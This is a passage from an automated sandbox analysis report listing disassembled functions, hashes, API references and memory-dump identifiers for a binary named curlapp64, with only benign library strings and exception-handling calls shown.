                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 442123175-278324492
                                                                                                                                                                                                  • Opcode ID: de007e242a76c49f2c339bd7c9c6f10008f507feb3b1eb281e055faa6516ba8a
                                                                                                                                                                                                  • Instruction ID: fbee9ec500c8fd12407a8cf561b5a667919dbd6c5b352382c78eb5e2c9de582f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: de007e242a76c49f2c339bd7c9c6f10008f507feb3b1eb281e055faa6516ba8a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31B572B28A9186DF209F15E4842A973B0FB54785F444431EB8DC7759DF3CE451CB10
                                                                                                                                                                                                  Function 00007FF6CF9B69FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75fileCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 442123175-278324492
                                                                                                                                                                                                  • Opcode ID: 7c0858a5e3102adca60832778b5248fde28060a2d17572859819f76410bc0e80
                                                                                                                                                                                                  • Instruction ID: f903f4c77a7c4897d10cad32c1b345f410de4fc0df816b446a082767fe39a5bc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c0858a5e3102adca60832778b5248fde28060a2d17572859819f76410bc0e80
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6531A232A18B818ADF609F19E4842A9B7A0FB58785F548471EACEC375ADF3CE515CB10
                                                                                                                                                                                                  Function 00007FF6CF99747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Number is too big.
                                                                                                                                                                                                  • API String ID: 909987262-3173473636
                                                                                                                                                                                                  • Opcode ID: a090ed241591c4a4d52f45b25e649df27c845dfd1e763d09a8b0af8231d4fb1c
                                                                                                                                                                                                  • Instruction ID: 8da848bb8d58697e99d4d47bad88b6e1ccaf5d66cca380f945dbf8da6d9ab2f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a090ed241591c4a4d52f45b25e649df27c845dfd1e763d09a8b0af8231d4fb1c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C112E82C0C1874FFDD96E78244A1B92B505F52712F6A4975D3DCC26DBAD0E6A0245B3
                                                                                                                                                                                                  Function 00007FF6CF99759E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Number is too big.
                                                                                                                                                                                                  • API String ID: 909987262-3173473636
                                                                                                                                                                                                  • Opcode ID: 8388db52fe5aa1dff4b0802fdf7136aaab611b643d2846209ab891bdd2e59d7b
                                                                                                                                                                                                  • Instruction ID: cdce52c8a9c7222bdf50a70c4402c65dbff11ec69d5adaf9352ca0994ff567cf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8388db52fe5aa1dff4b0802fdf7136aaab611b643d2846209ab891bdd2e59d7b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84211842C0D2875EFE6A6F78245A1BD2F508F62742F564976D3FD826CB9C0D66048273
                                                                                                                                                                                                  Function 00007FF6CF9A5B70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CF9711FF), ref: 00007FF6CF9A5BC0
                                                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CF9711FF), ref: 00007FF6CF9A5C01
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                  • Opcode ID: 3f99c14d675360cdb2fd672c74c8d20d49bed5fe7e78e3d1762e74f12cc6558c
                                                                                                                                                                                                  • Instruction ID: 72528de755adc1b29e6c1afecbd886f8818b63ab4b95175ad2a33a9be485edcf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f99c14d675360cdb2fd672c74c8d20d49bed5fe7e78e3d1762e74f12cc6558c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70112832A18B8182EB618F15E440269BBE5FB88B95F584230EFCD47B9ADF3CD551CB00
                                                                                                                                                                                                  Function 00007FF6CF997550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Precision is not an integer.$Width is not an integer.
                                                                                                                                                                                                  • API String ID: 909987262-2148321804
                                                                                                                                                                                                  • Opcode ID: 4ba6db31c8cdbc95cffc2736e94b089ef682b164423f77285008a3c18570d7f0
                                                                                                                                                                                                  • Instruction ID: f1e1a282d433812ee7644f5b76c8397c08aa95025b2efdd415e8e7cc4b6b92d2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ba6db31c8cdbc95cffc2736e94b089ef682b164423f77285008a3c18570d7f0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADA00110E2954695E988BF119C968A513206BA5302FB04832E19DC1AAB5E2CA6968621